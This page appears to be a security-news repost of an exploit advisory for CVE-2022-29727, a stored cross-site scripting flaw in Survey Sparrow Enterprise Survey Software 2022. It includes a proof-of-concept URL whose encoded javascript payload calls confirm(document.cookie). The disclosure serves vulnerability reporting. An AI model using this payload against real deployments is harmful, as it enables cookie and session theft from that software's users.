Security
Headlines
HeadlinesLatestCVEs

Headline

Survey Sparrow Enterprise Survey Software 2022 Cross Site Scripting

Survey Sparrow Enterprise Survey Software 2022 suffers from a persistent cross site scripting vulnerability.

Packet Storm
#xss#vulnerability#windows#git#java#auth
# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)# Date: May 11 2022# Exploit Author: Pankaj Kumar Thakur# Vendor Homepage: https://surveysparrow.com/# Software Link: https://surveysparrow.com/enterprise-survey-software/# Version: 2022# Tested on: Windows# CVE : CVE-2022-29727# References:https://www.tenable.com/cve/CVE-2022-29727https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022#POCFor Stored XSSVisithttps://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//XSS Executed

Related news

CVE-2022-29727: Enterprise-Survey-Software/Enterprise-Survey-Software 2022 at main · haxpunk1337/Enterprise-Survey-Software

Survey Sparrow Enterprise Survey Software 2022 has a Stored cross-site scripting (XSS) vulnerability in the Signup parameter.

CVE-2022-29727: Enterprise-Survey-Software/Enterprise-Survey-Software 2022 at main · haxpunk1337/Enterprise-Survey-Software

Survey Sparrow Enterprise Survey Software 2022 has a Stored cross-site scripting (XSS) vulnerability in the Signup parameter.

Packet Storm: Latest News

NIELD (Network Interface Events Logging Daemon) 0.6.2